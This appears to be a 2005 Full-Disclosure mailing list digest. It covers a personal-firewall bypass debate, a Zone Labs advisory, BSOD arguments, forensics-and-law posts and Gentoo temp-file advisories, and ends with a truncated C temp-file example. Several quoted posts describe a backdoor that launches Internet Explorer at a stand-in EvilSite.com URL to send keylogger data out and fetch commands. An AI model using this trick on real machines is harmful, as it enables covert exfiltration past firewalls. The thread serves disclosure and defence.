> Bypassing Personal Firewall & let an internal (evil) application communicate
> with the external world, that hard? I mean... OK try this Lets.. me
> give you a simple concept. I'll call it 'passive communication' ( for lack of
> a better word)
> 
> say... a backdoor wants to communicate to its server... What it can do is use
> a trusted internal application to do the job. Suppose; it creates a batch
> file, runs the batch file (evil.bat) & executes this command
> 
> Internet Explorer\> iexplore.exe
> www.EvilSite.com/?cmd=submit&f=___KeyLog__
> 
> the batch file will get executed & Internet Explorer will happily send the
> DATA. This trick can be used to send OUTPUT as well as get input... without
> triggering the firewall.
> 
> To get input; what the backdoor can do is... say, run a similar BAT script:
> 
> Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS
> 
> well... the history of the page
> www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then
> what the backdoor can do is... RUN a string based 'GREP' in the IE cache & see if
> there

Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread TheGesus
> On Mon, 03 Oct 2005 06:42:37 PDT, Steve Friedl said:
> > On Mon, Oct 03, 2005 at 08:50:27AM -0400, [EMAIL PROTECTED] wrote:

> Perhaps if they hadn't been so busy designing baroque undocumented APIs for
> the use of their own monopolistic software(*), they could have designed a
> cleaner API that would have resulted in more stable third-party drivers ;)
>

They did have such an API at one time... in NT 3.51.

In NT4 they redesigned the GDI so that the user could bypass
"userland" and talk straight to the kernel.

It's been so long I don't recall the exact details, but this re-hack
paved the way for  DirectX and sped up the response of the new
desktop, which of course was lifted from Windows 95.

After NT4 anything that hooked into the GDI could BSOD.  New video
driver?  BSOD.  New printer driver?  BSOD.  It was quite a mess.

Still is.

Worst design flaw ever.


Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Valdis . Kletnieks
On Mon, 03 Oct 2005 06:42:37 PDT, Steve Friedl said:
> On Mon, Oct 03, 2005 at 08:50:27AM -0400, [EMAIL PROTECTED] wrote:
> > One acronym: BSOD.  Why have users learned what it is, and grown accepting 
> > of
> > seeing one?  Do you know any Windows users who have *never* encountered one?
> 
> The majority of BSODs are caused by buggy third-party drivers and malware
> (rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?

Perhaps if they hadn't been so busy designing baroque undocumented APIs for the
use of their own monopolistic software(*), they could have designed a cleaner
API that would have resulted in more stable third-party drivers ;)

(*) Yes, they exist.  Remember MS having to open and document them as part of
one of their anti-trust losses? ;)



RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

2005-10-03 Thread Debasis Mohanty
Just to correct my last statement in my previous reply - 
>> There is another way by which an evil-code can get this run is by moving
>> the batch file to system startup 
>> or pointing it in the registry to run on system boot but this will be a
>> warning signal for the user.  

Even ZA Pro blocks and warns the user if some program (evil or trusted) is
trying to become a system startup program. Sorry for that mistake, had too
much with Paul & Zone Labs ;-)

-D

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Debasis
Mohanty
Sent: Tuesday, October 04, 2005 12:25 AM
To: 'Bipin Gautam'; 'Zone Labs Security Team'
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: RE: [Full-disclosure] Bypassing Personal Firewall, is it that*
hard?

Bipin Gautam wrote:
>> Anyways... is Bypassing Personal Firewall & let an internal (evil)
>> application communicate with the external world, that hard?

Yes Indeed !! As long as you are trying out this concept with the current
versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it
even traps inter-process communications and windows messaging between two
different processes and prompts for user's permission. This goes ahead of
normal desktop based fw with more defense methods than just protecting a PC
from network based attacks. 


>> Suppose; it creates a batch file run the batch file  (evil.bat) &
>> executes this command
>> Internet Explorer\> iexplore.exe
>> www.EvilSite.com/?cmd=submit&f=___KeyLog__

To execute the batch file, the evil-program needs to trigger the execution
of the batch file and this is easily prevented by ZA Pro.. Normally the
evil-code will use the api shell() which is prevented. 

However, this will work if the users click on the batch file or run it via
Start->Run but this is not the way evil-code works. In this scenario ZA
Pro clearly distinguishes between user intervention and a program
communicating with another program. 


There is another way by which an evil-code can get this run is by moving the
batch file to system startup or pointing it in the registry to run on system
boot but this will be a warning signal for the user. 

- D



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
Sent: Monday, October 03, 2005 11:57 PM
To: Zone Labs Security Team
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application communicate
with the external world, that hard? I mean... OK try this Lets.. me
give you a simple concept. I'll call it 'passive communication' ( for lack of
a better word)

say... a backdoor wants to communicate to its server... What it can do is use
a trusted internal application to do the job. Suppose; it creates a batch
file, runs the batch file (evil.bat) & executes this command

Internet Explorer\> iexplore.exe
www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet Explorer will happily send the
DATA. This trick can be used to send OUTPUT as well as get input... without
triggering the firewall.

To get input; what the backdoor can do is... say, run a similar BAT script:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then
what the backdoor can do is... RUN a string based 'GREP' in the IE cache & see if
there is any new job to accomplish.

just a rough theory... but ya its POSSIBLE; to let an internal backdoor have
I/O with its server without triggering the firewall alert

---
yap it does work... using the same trick can't the backdoor happily
communicate with its server using the trick

On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) 
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue 
> with personal firewalls to several security email lists on
> September 28th, 2005.   Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and Check Point 
> end-point security products are not vulnerable.
>
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access the 
> network on behalf of the untrusted program, thereby accessing the 
> network without warning from the firewall.
>
>
> Impact:
>
> If successfully exploited, a malicious program may be able to
> access the network via a trusted program.   The ability to
> access the network would be limited to the functionality of the 
> trusted program.
>
>
> Unaffected Products:
>
> ZoneAlarm Pro, ZoneA

Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

2005-10-03 Thread Thierry Zoller

> integrated HIPS. (although a function which
> can be very annoying sometimes.)
To be more precise they call it "behavior blocking".

--
Thierry Zoller
mailto:[EMAIL PROTECTED]




RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

2005-10-03 Thread Debasis Mohanty
Bipin Gautam wrote:
>> Anyways... is Bypassing Personal Firewall & let an internal (evil)
>> application communicate with the external world, that hard?

Yes Indeed !! As long as you are trying out this concept with the current
versions of ZA Pro and few prior versions... The beauty of ZA Pro is, it
even traps inter-process communications and windows messaging between two
different processes and prompts for user's permission. This goes ahead of
normal desktop based fw with more defense methods than just protecting a PC
from network based attacks. 


>> Suppose; it creates a batch file run the batch file  (evil.bat) &
>> executes this command
>> Internet Explorer\> iexplore.exe
>> www.EvilSite.com/?cmd=submit&f=___KeyLog__

To execute the batch file, the evil-program needs to trigger the execution
of the batch file and this is easily prevented by ZA Pro.. Normally the
evil-code will use the api shell() which is prevented. 

However, this will work if the users click on the batch file or run it via
Start->Run but this is not the way evil-code works. In this scenario ZA
Pro clearly distinguishes between user intervention and a program
communicating with another program. 


There is another way by which an evil-code can get this run is by moving the
batch file to system startup or pointing it in the registry to run on system
boot but this will be a warning signal for the user. 

- D



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Bipin Gautam
Sent: Monday, October 03, 2005 11:57 PM
To: Zone Labs Security Team
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application communicate
with the external world, that hard? I mean... OK, try this... Let me
give you a simple concept. I'll call it 'passive communication' (for lack of
a better word).

say... a backdoor wants to communicate with its server... What it can do is
use a trusted internal application to do the job. Suppose it creates a batch
file, runs the batch file (evil.bat) & executes this command

Internet Explorer\> iexplore.exe
www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet Explorer will happily send the
DATA. This trick can be used to send OUTPUT as well as get input... without
triggering the firewall.

To get input, the backdoor can, say, run a similar BAT script:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then
the backdoor can RUN a string-based 'GREP' in the IE cache & see if
there is any new job to accomplish.

just a rough theory... but ya, it's POSSIBLE to let an internal backdoor have
I/O with its server without triggering the firewall alert

---
yap, it does work... using the same trick, can't the backdoor happily
communicate with its server?

On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) 
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue 
> with personal firewalls to several security email lists on
> September 28th, 2005.   Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and Check Point 
> end-point security products are not vulnerable.
>
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access the 
> network on behalf of the untrusted program, thereby accessing the 
> network without warning from the firewall.
>
>
> Impact:
>
> If successfully exploited, a malicious program may be able to
> access the network via a trusted program.   The ability to
> access the network would be limited to the functionality of the 
> trusted program.
>
>
> Unaffected Products:
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, and 
> ZoneAlarm Security Suite version 6.0 or later automatically protect 
> against this attack in the default configuration.
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, and 
> ZoneAlarm Security Suite version 5.5 are protected against this attack 
> by enabling the "Advanced Program Control" feature.
>
> Check Point Integrity client versions 6.0 and 5.5 are protected 
> against this attack by enabling the "Advanced Program Control" feature.
>
>
> Affected Products:
>
> ZoneAlarm free versions lack the "Advanced Program Control"
> feature and are therefore unable to prevent this bypass technique.
>
>
> Recommended Actions:
>
> Subscribers should upgrade to the latest version of their ZoneAlarm 
> product or enable the "Advan

Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Steve Friedl
On Mon, Oct 03, 2005 at 10:37:05AM -0600, Bruce Ediger wrote:
> Does any kind of evidence (apart from PR-flack-based spin) exist
> for this conclusion?

This is what Microsoft tells me they gather from the online error
reporting and crash analysis, and it comports with my experience as
well. I know I've caused my own share when I was writing print drivers:
no way those were Microsoft's fault.

I suppose that even if this data is as claimed, it could be skewed by
those who primarily see MS-caused faults choosing not to submit these
reports. I very much doubt the details are public, so one is probably
left to the mercy of whether you believe Microsoft or not.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

2005-10-03 Thread Thierry Zoller

Bipin,
That's very old news; we were discussing an approach a bit more elegant
than this. And yes, it's that hard nowadays: Kerio will easily block
your bat file due to its integrated HIPS (although a function which
can be very annoying sometimes).

BG> the batch file will get executed & Internet explorer will happily send
BG> the DATA. This trick can be used to send OUTPUT as well as get
BG> input... without trigering the firewall.

Thierry Zoller
mailto:[EMAIL PROTECTED]




[Full-disclosure] Bypassing Personal Firewall, is it that* hard?

2005-10-03 Thread Bipin Gautam
hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application
communicate with the external world, that hard? I mean... OK, try
this... Let me give you a simple concept. I'll call it
'passive communication' (for lack of a better word).

say... a backdoor wants to communicate with its server... What it can do
is use a trusted internal application to do the job. Suppose it
creates a batch file, runs the batch file (evil.bat) & executes this
command

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet Explorer will happily send
the DATA. This trick can be used to send OUTPUT as well as get
input... without triggering the firewall.

To get input, the backdoor can, say, run a similar BAT script:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE
cache... Then the backdoor can RUN a string-based 'GREP' in
the IE cache & see if there is any new job to accomplish.

just a rough theory... but ya, it's POSSIBLE to let an internal backdoor
have I/O with its server without triggering the firewall alert

---
yap, it does work... using the same trick, can't the backdoor happily
communicate with its server?

On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro)
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue
> with personal firewalls to several security email lists on
> September 28th, 2005.   Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and
> Check Point end-point security products are not vulnerable.
>
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access
> the network on behalf of the untrusted program, thereby accessing
> the network without warning from the firewall.
>
>
> Impact:
>
> If successfully exploited, a malicious program may be able to
> access the network via a trusted program.   The ability to
> access the network would be limited to the functionality of the
> trusted program.
>
>
> Unaffected Products:
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
> and ZoneAlarm Security Suite version 6.0 or later automatically
> protect against this attack in the default configuration.
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
> and ZoneAlarm Security Suite version 5.5 are protected against
> this attack by enabling the "Advanced Program Control" feature.
>
> Check Point Integrity client versions 6.0 and 5.5 are protected
> against this attack by enabling the "Advanced Program Control" feature.
>
>
> Affected Products:
>
> ZoneAlarm free versions lack the "Advanced Program Control"
> feature and are therefore unable to prevent this bypass technique.
>
>
> Recommended Actions:
>
> Subscribers should upgrade to the latest version of their
> ZoneAlarm product or enable the "Advanced Program Control" feature.
>
>
> Related Resources:
>
> Zone Labs Security Services http://www.zonelabs.com/security
>
>
> Contact:
>
> Zone Labs customers who are concerned about this vulnerability or
> have additional technical questions may reach our Technical Support
> group at: http://www.zonelabs.com/support/.
>
> To report security issues with Zone Labs products contact
> [EMAIL PROTECTED] Note that any other matters sent to this
> email address will not receive a response.
>
>
> Disclaimer:
>
> The information in the advisory is believed to be accurate at the
> time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS
> condition. There are no warranties with regard to this information.
> Neither the author nor the publisher accepts any liability for any
> direct, indirect, or consequential loss or damage arising from use
> of, or reliance on, this information. Zone Labs and Zone Labs
> products, are registered trademarks of Zone Labs LLC. and/or
> affiliated companies in the United States and other countries.
> All other registered and unregistered trademarks represented in
> this document are the sole property of their respective
> companies/owners.
>
> Copyright: (c)2005 Zone Labs LLC All rights reserved. Zone Labs,
> TrueVector, ZoneAlarm, and Cooperative Enforcement are registered
> trademarks of Zone Labs LLC The Zone Labs logo, Check Point
> Integrity and IMsecure are trademarks of Zone Labs, LLC. Check Point
> Integrity protected under U.S. Patent No. 5,987,611. Reg. U.S. Pat.
> & TM Off. Cooperative Enforcement is a service mark of Zone Labs LLC.
> All other trademarks are the property of their respective owners.

[Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 3

2005-10-03 Thread Cooper, Christopher
* Jason Coombs:  /* There is simply no way for law enforcement to know the 
difference between innocent and guilty persons based on hard drive data
circumstantial evidence. */
Jason,

Are you stumping for work as a defense expert?  I hope so, because I know 
several Law Enforcement Officers who would love to challenge your positions in 
court.

You are over-generalizing an issue and a group of people. It IS possible for 
law enforcement or anyone examining data to know the difference between 
innocent and guilty persons based on hard drive data.  One simply needs to look 
beyond the general information provided to them by the software tools. Can 
you give me an example of a trojan, worm, or another program which has added 
the last USB device installed in the Windows Registry, or how about a program, 
worm, or trojan which caused something to be added to the last typed URL?

Off subject: Do you plan to fix the links on your site at 
http://www.science.org/jasonc/writing.html? Most of the links no longer exist 
or don't have your name on the published line. Thanks and cheers.

-C...

RE: [Full-disclosure] Different Claims by ZoneLabs on the "Bypassing PersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

2005-10-03 Thread Debasis Mohanty
>> Paul Laudanski
>> What I'm saying is that the vendor never claimed ZAP versions prior to 5
>> are not vulnerable in the report.

Funny Paul!! You are simply exaggerating the same point again and again
in a new style each time. Well, they don't even say that ZAP versions prior
to v5 are vulnerable in their advisory.

Can you say Product X Pro is unaffected by a particular vulnerability while
Product X (ver 4x / 5x ..) is vulnerable? NO! The statement is not
specific and will keep the customers/users clueless as to whether or not their
firewall version is weak. The vendor needs to be specific here, saying which
versions of Product X Pro are unaffected and which are not.

You may also like to read the ZA users' comments on this issue posted at
Zone Labs' user forum -
http://forums.zonelabs.com/zonelabs/board/message?board.id=security&message.id=13104#M13104


It's really funny to see that the vendor wants to keep their EGO up-2-date by
covering up this issue with their latest version 6.0 =))



Gud Luck !! 

-D





-Original Message-
From: Paul Laudanski [mailto:[EMAIL PROTECTED] 
Sent: Monday, October 03, 2005 9:06 PM
To: Debasis Mohanty
Cc: 'Zone Labs Security Team'; bugtraq@securityfocus.com;
full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Different Claims by ZoneLabs on the
"Bypassing PersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

On Mon, 3 Oct 2005, Debasis Mohanty wrote:

> Paul,
> 
> >> This does not include the version 3.7.159 you are testing.  
> 
> Didn't get what you mean by "This does not include". Do 
> you mean whether or not version 3.7.159 is vulnerable it shouldn't be 
> considered??

What I'm saying is that the vendor never claimed ZAP versions prior to 5 are
not vulnerable in the report.  So your comment is redundant.  Simply
upgrade your version.  Ciao.

--
Paul Laudanski, Microsoft MVP Windows-Security CastleCops(SM),
http://castlecops.com





Re: [Full-disclosure] Careless Law Enforcement Computer ForensicsLacking InfoSec Expertise Causes Suicides

2005-10-03 Thread Steve Kudlak


I have been following this in the background because a number of my 
friends who got zapped in the high tech spindown out here in California 
have ended up in computer forensics and datamining because that's what 
gets money these days. Some are happy and some are a bit concerned. I am 
currently disabled and on good days I get the feeling I want to jump 
back in and on bad days I sleep to 3pm.


It would be interesting to look at these questions from an international 
perspective. I am sure there is some maneuvering around by, say, the 
"Anti-Sex Tourism" Task Forces to see if they can get things done in 
the most sympathetic areas. Right now much of the prosecutions happen in 
the US because the US Federal Government has a lot of power.  Federal 
prosecution often proceeds by sort of getting a bunch of warrants, going 
and seizing someone's property, then looking into everything they could have 
possibly done wrong, threatening the person involved and then offering 
them a deal where they become a convicted felon for something. This is 
what happened in the case of US artist Steve Kurtz, who was going to be 
charged with bioterrorism and it is now down to questionable mail fraud.


If things proceed like this it is good to know this is what one might be 
contributing to with the fruits of one's labours. So it would be good 
to look into this stuff and find how it actually works, although yes, it 
would have to be from an international perspective. Speaking of France, I 
mean the US has always been trying to get Roman Polanski back on US soil. ;)


Have Fun,
Sends Steve



Paul Schmehl wrote:

> --On Monday, October 03, 2005 09:38:16 -0400 Lane Weast 
> <[EMAIL PROTECTED]> wrote:
>
> > In theory, what you say is incorrect.
> >
> > They may take you in but, in court they have to prove it was yours.
> > It is not your responsibility to prove your innocence.
> > It is their responsibility to prove your guilt.
>
> Whenever I read stuff like this on an international list, I always 
> wonder if the people posting understand that the rest of the world 
> doesn't necessarily work the way your little corner of the world works.
>
> For example, French law, which is based upon Napoleonic law, places 
> the burden of proof on the defendant.  You are guilty unless you can 
> prove you're innocent.
>
> So, your comments almost certainly do not apply to many people reading 
> here.  Which causes one to wonder - what value do they have to the 
> audience reading?
>
> Paul Schmehl ([EMAIL PROTECTED])
> Adjunct Information Security Officer
> University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/ir/security/







Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Micheal Espinola Jr
err, But Steve's conclusion is consistent with my own...

On 10/3/05, Micheal Espinola Jr <[EMAIL PROTECTED]> wrote:
> Bruce, I don't think you are going to find hard "evidence" for either
> conclusion.  But Bruce's conclusion is consistent with my own
> experiences, and that of many other Administrators that I discuss
> issues like this with.
>
> Since its inception, supporting NT 3.0 beta and onward, I have been
> dealing with BSOD's.  In total, there have been comparatively very few
> times where it was a direct fault of MS code.  It has very commonly
> been in relation to 3rd party drivers that needed reworking or
> updating by the 3rd-party manufacturer.
>
> This is not PR spin (of which I don't think you could find any
> published PR spin for either side of this argument either).  This is
> real world experience with the NT+ products across i386 and Alpha
> hardware platforms using peripheral devices from many different major
> manufacturers.  There are admins on both sides of the anti-MS fence
> that I communicate with that would agree with this conclusion.
>
>
>
> On 10/3/05, Bruce Ediger <[EMAIL PROTECTED]> wrote:
> > On Mon, 3 Oct 2005, Steve Friedl wrote:
> >
> > > The majority of BSODs are caused by buggy third-party drivers and malware
> > > (rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?
> >
> > Does any kind of evidence (apart from PR-flack-based spin) exist for this
> > conclusion?
> >
> > Can you point me to it?
> >
> > Sincerely,
> > Bruce Ediger
> >
>
>
> --
> ME2  
>


--
ME2  


Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Micheal Espinola Jr
Bruce, I don't think you are going to find hard "evidence" for either
conclusion.  But Bruce's conclusion is consistent with my own
experiences, and that of many other Administrators that I discuss
issues like this with.

Since its inception, supporting NT 3.0 beta and onward, I have been
dealing with BSOD's.  In total, there have been comparatively very few
times where it was a direct fault of MS code.  It has very commonly
been in relation to 3rd party drivers that needed reworking or
updating by the 3rd-party manufacturer.

This is not PR spin (of which I don't think you could find any
published PR spin for either side of this argument either).  This is
real world experience with the NT+ products across i386 and Alpha
hardware platforms using peripheral devices from many different major
manufacturers.  There are admins on both sides of the anti-MS fence
that I communicate with that would agree with this conclusion.



On 10/3/05, Bruce Ediger <[EMAIL PROTECTED]> wrote:
> On Mon, 3 Oct 2005, Steve Friedl wrote:
>
> > The majority of BSODs are caused by buggy third-party drivers and malware
> > (rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?
>
> Does any kind of evidence (apart from PR-flack-based spin) exist for this
> conclusion?
>
> Can you point me to it?
>
> Sincerely,
> Bruce Ediger
>


--
ME2  


Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Bruce Ediger

On Mon, 3 Oct 2005, Steve Friedl wrote:

> The majority of BSODs are caused by buggy third-party drivers and malware
> (rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?


Does any kind of evidence (apart from PR-flack-based spin) exist for this
conclusion?

Can you point me to it?

Sincerely,
Bruce Ediger


[Full-disclosure] [CIRT.DK - Advisory] Windows XP SP2 Local TFTP HEAP based Overflow

2005-10-03 Thread CIRT.DK Advisory
[Description]
The Windows XP tftp.exe software is vulnerable to a local heap-based
overflow, allowing arbitrary commands to be run on the system as the
user issuing the overflow.

[Complete advisory]
CIRT.DK Advisory 38 can be read at http://www.cirt.dk/

Regards
CIRT.DK



[Full-disclosure] [ GLSA 200510-02 ] Berkeley MPEG Tools: Multiple insecure temporary files

2005-10-03 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Berkeley MPEG Tools: Multiple insecure temporary files
  Date: October 03, 2005
  Bugs: #107344
ID: 200510-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Berkeley MPEG Tools use temporary files in various insecure ways,
potentially allowing a local user to overwrite arbitrary files.

Background
==

The Berkeley MPEG Tools are a collection of utilities for manipulating
MPEG video technology, including an encoder (mpeg_encode) and various
conversion utilities.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  media-video/mpeg-tools  < 1.5b-r2  >= 1.5b-r2

Description
===

Mike Frysinger of the Gentoo Security Team discovered that mpeg_encode
and the conversion utilities were creating temporary files with
predictable or fixed filenames. The 'test' make target of the MPEG
Tools also relied on several temporary files created insecurely.

Impact
==

A local attacker could create symbolic links in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When
the utilities are executed (or 'make test' is run), this would result
in the file being overwritten with the rights of the user running the
command.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Berkeley MPEG Tools users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/mpeg-tools-1.5b-r2"

References
==

  [ 1 ] CAN-2005-3115
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3115

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-02.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or, alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0




RE: [Full-disclosure] Careless Law Enforcement Computer ForensicsLacking InfoSec Expertise Causes Suicides

2005-10-03 Thread Paul Schmehl
--On Monday, October 03, 2005 09:38:16 -0400 Lane Weast 
<[EMAIL PROTECTED]> wrote:

> In theory, what you say is incorrect.
>
> They may take you in but, in court they have to prove it was yours.
> It is not your responsibility to prove your innocence.
> It is their responsibility to prove your guilt.

Whenever I read stuff like this on an international list, I always wonder 
if the people posting understand that the rest of the world doesn't 
necessarily work the way your little corner of the world works.

For example, French law, which is based upon Napoleonic law, places the 
burden of proof on the defendant.  You are guilty unless you can prove 
you're innocent.

So, your comments almost certainly do not apply to many people reading 
here.  Which causes one to wonder - what value do they have to the audience 
reading?

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/


[Full-disclosure] [ GLSA 200510-01 ] gtkdiskfree: Insecure temporary file creation

2005-10-03 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: gtkdiskfree: Insecure temporary file creation
  Date: October 03, 2005
  Bugs: #104565
ID: 200510-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

gtkdiskfree is vulnerable to symlink attacks, potentially allowing a
local user to overwrite arbitrary files.

Background
==

gtkdiskfree is a GTK-based GUI to show free disk space.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  app-admin/gtkdiskfree < 1.9.3-r1  >= 1.9.3-r1

Description
===

Eric Romang discovered that gtkdiskfree insecurely creates a
predictable temporary file to handle command output.

Impact
==

A local attacker could create a symbolic link in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When
gtkdiskfree is executed, this would result in the file being
overwritten with the rights of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All gtkdiskfree users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-admin/gtkdiskfree-1.9.3-r1"

References
==

  [ 1 ] CAN-2005-2918
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2918
  [ 2 ] Original Advisory
http://www.zataz.net/adviso/gtkdiskfree-09052005.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-01.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or, alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



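GLSA 200510-02 and GLSA 200510-01 above describe the same bug class: a utility writes to a predictable name in the temporary directory, so a symlink planted there beforehand redirects the write onto another file with the user's privileges. The C below is an added example, not code from mpeg-tools, gtkdiskfree or Gentoo; it builds its own scratch directory (constructed, no real target) with a victim file and a planted link, and shows that the naive open follows the link while O_CREAT|O_EXCL|O_NOFOLLOW, and mkstemp(), refuse it.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The pattern both advisories describe: a fixed, predictable path is opened
 * for writing. fopen(..., "w") follows whatever already sits at that path,
 * so a symlink planted there by another local user redirects the write onto
 * the link target, with the privileges of the user running the utility. */
static int write_temp_predictable(const char *fixed_path, const char *data)
{
    FILE *fp = fopen(fixed_path, "w");
    if (fp == NULL)
        return -1;
    fputs(data, fp);
    return fclose(fp) == 0 ? 0 : -1;
}

/* Hardened variant: O_CREAT|O_EXCL fails with EEXIST if anything, a symlink
 * included, already occupies the path, and O_NOFOLLOW refuses to traverse a
 * symlink in the final component. Mode 0600 keeps the file private. */
static int write_temp_exclusive(const char *path, const char *data)
{
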